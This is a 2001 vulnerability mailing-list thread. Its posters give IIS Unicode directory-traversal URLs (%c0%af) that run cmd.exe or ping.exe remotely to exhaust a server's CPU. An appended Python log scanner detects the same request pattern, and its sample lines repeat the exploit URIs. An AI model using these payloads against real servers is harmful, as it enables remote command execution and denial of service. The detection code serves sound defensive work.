Vulnerability Development mailing list archives
Re: ping -i (TTL) Vulnerability
From: Reddog Hummer <reddog_33 () HOTMAIL COM>
Date: Thu, 22 Feb 2001 07:43:42 -0000
even better.

http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/ping+-t+127.0.0.1+-i+0

this works when cmd is disabled

red

From: Reverend Lola <reverend_lola () YAHOO COM>
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: ping -i (TTL) Vulnerability
Date: Wed, 21 Feb 2001 15:34:49 -0800

>-----Original Message-----
>From: Damian Menscher [mailto:menscher () UIUC EDU]
>Sent: Wednesday, February 21, 2001 12:20 PM
>To: VULN-DEV () SECURITYFOCUS COM
>Subject: Re: ping -i (TTL) Vulnerability

%<-----SNIP----->%
>No doubt that this would do absolutely nothing from a remote location.
%<-----SNIP----->%

Actually, it does.

I used the Unicode bug to send the command to a remote server (NT 4, SP6a, IIS4):

http://xx.xx.xx.xx/scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+127.0.0.1+-i+0

CPU usage on the target server went to 100%, and stayed there. Task Manager showed ping.exe was using a HUGE amount of system resources (this increased memory usage by a bit as well). I tried to stop ping.exe, and could not. Since ping.exe was started by IIS, I then tried to stop the web server, but it was not responding either. The only way to stop it was to reboot.

I'm sure the script kiddies will have fun with this one. :)
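
A defender-side check for the request pattern discussed in this thread, added here as an example and not part of the original posts: it flags logged URIs that contain overlong UTF-8 (such as `%c0%af`), resolve to a `../` traversal once decoded leniently, and reach a binary under `/winnt/system32/`. The log layout, the function names and the sample lines are constructed assumptions; the folding step covers any 2-byte overlong sequence, not only the one in the thread.

```python
import re
from urllib.parse import unquote_to_bytes

# 0xC0/0xC1 lead bytes only occur in overlong (non-shortest-form) UTF-8,
# which a strict decoder rejects; "%c0%af" is an overlong encoding of "/".
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
SYSTEM_DIR = re.compile(rb"/winnt/system32/([^/?+ ]+)")

def fold_overlong(raw: bytes) -> bytes:
    """Map each 2-byte overlong sequence to the ASCII byte it stands for."""
    return OVERLONG.sub(
        lambda m: bytes([((m.group()[0] & 0x1F) << 6) | (m.group()[1] & 0x3F)]),
        raw)

def classify(uri: str) -> list:
    """Return the reasons a request URI matches the pattern in this thread."""
    raw = unquote_to_bytes(uri)          # percent-decode, keep raw bytes
    reasons = []
    if OVERLONG.search(raw):
        reasons.append("overlong-utf8")
    # Decode the way a lenient server would, then normalise separators.
    folded = fold_overlong(raw).replace(b"\\", b"/").lower()
    if b"../" in folded:
        reasons.append("traversal")
    hit = SYSTEM_DIR.search(folded)
    if hit:
        reasons.append("system32:" + hit.group(1).decode("ascii", "replace"))
    return reasons

# Constructed sample log lines (assumed layout: c-ip method uri status).
SAMPLE_LOG = """\
192.0.2.10 GET /default.htm 200
192.0.2.44 GET /scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+ping+-t+127.0.0.1+-i+0 200
192.0.2.44 GET /scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/ping+-t+127.0.0.1+-i+0 200
192.0.2.51 GET /images/caf%c3%a9.gif 200
"""

def scan(log_text: str) -> list:
    """Return (client, reasons) for every log line that gets flagged."""
    alerts = []
    for line in log_text.splitlines():
        client, _method, uri, _status = line.split()
        reasons = classify(uri)
        if reasons:
            alerts.append((client, reasons))
    return alerts

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, ",".join(reasons))
```

Valid multi-byte UTF-8 such as `%c3%a9` is not flagged, and the second sample line shows why matching on `cmd.exe` alone misses the variant that calls `ping` directly.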